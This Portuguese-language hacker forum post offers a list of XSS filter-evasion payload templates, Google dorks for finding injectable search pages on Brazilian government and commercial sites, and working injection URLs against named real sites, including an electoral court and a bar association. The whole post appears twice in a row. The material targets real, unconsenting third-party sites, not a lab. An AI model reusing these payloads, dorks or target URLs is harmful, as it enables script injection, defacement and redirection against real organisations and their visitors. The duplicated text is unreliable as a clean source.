Olá galerinha... Estou aqui disponibilizando alguns filtros de Cross-Site Scripting mais conhecido como XSS(gosto muito, rsrs), para vocês aumentarem seus conhecimentos! (:
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
Já disponibilizei os filtros, agora vou disponibilizar alguns sites vulneráveis à XSS para vocês treinarem e algumas dork para vocês procurarem sites vulneráveis no GOOGLE ou em algum mecanismo de busca de sua preferência...![Sorridente](https://forum.guiadohacker.com.br/images/smilies/biggrin.png)
:..DORK PARA BUSCA DE SITES VULL..:
allinurl:"busca.php?q="
allinurl:"find.php?q="
inurl:".gov.br" & inurl:"busca.php?"
inurl:".com.br" & inurl:".php?id=" & intext:"pasta"
:..SITES VULL à XSS..:
http://www.infonet.com.br/cidade/listar.asp?keywords=&imageField2.x=0&imageField2.y =0&canal=%22%3E%3Ca%20href=%22http://forum.guiadohacker.com.br%22%3EWCG_147%20emo%3Ca/%3E%3C!--+cidade
http://www.oabsergipe.com.br/novo/buscar.php?p2=%3Ca%20href=%22http://xvideos.com%22%3E%3Ch1%3Eclique%20aqui!%3C/h1%3E%3C/a%3E&ok2.x=0&ok2.y=0
http://www.tre-se.gov.br/verpagina.jsp?barra=T&pagina=/noticias/informes_abrir.jsp?obj_informe=3485%22%3E--%3E%3Ca%20href=%22http://google.com.br%22%3E2%3C/a%3E%3Cscript%3Ealert(%22123%22);%3C/script%3E%3C!--+
http://www.odontoserv.com.br/portal/home.php?p=dic&c=1'
Até+...
Att didinho... (:
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
Já disponibilizei os filtros, agora vou disponibilizar alguns sites vulneráveis à XSS para vocês treinarem e algumas dork para vocês procurarem sites vulneráveis no GOOGLE ou em algum mecanismo de busca de sua preferência...
![Sorridente](https://forum.guiadohacker.com.br/images/smilies/biggrin.png)
:..DORK PARA BUSCA DE SITES VULL..:
allinurl:"busca.php?q="
allinurl:"find.php?q="
inurl:".gov.br" & inurl:"busca.php?"
inurl:".com.br" & inurl:".php?id=" & intext:"pasta"
:..SITES VULL à XSS..:
http://www.infonet.com.br/cidade/listar.asp?keywords=&imageField2.x=0&imageField2.y =0&canal=%22%3E%3Ca%20href=%22http://forum.guiadohacker.com.br%22%3EWCG_147%20emo%3Ca/%3E%3C!--+cidade
http://www.oabsergipe.com.br/novo/buscar.php?p2=%3Ca%20href=%22http://xvideos.com%22%3E%3Ch1%3Eclique%20aqui!%3C/h1%3E%3C/a%3E&ok2.x=0&ok2.y=0
http://www.tre-se.gov.br/verpagina.jsp?barra=T&pagina=/noticias/informes_abrir.jsp?obj_informe=3485%22%3E--%3E%3Ca%20href=%22http://google.com.br%22%3E2%3C/a%3E%3Cscript%3Ealert(%22123%22);%3C/script%3E%3C!--+
http://www.odontoserv.com.br/portal/home.php?p=dic&c=1'
Até+...
Att didinho... (: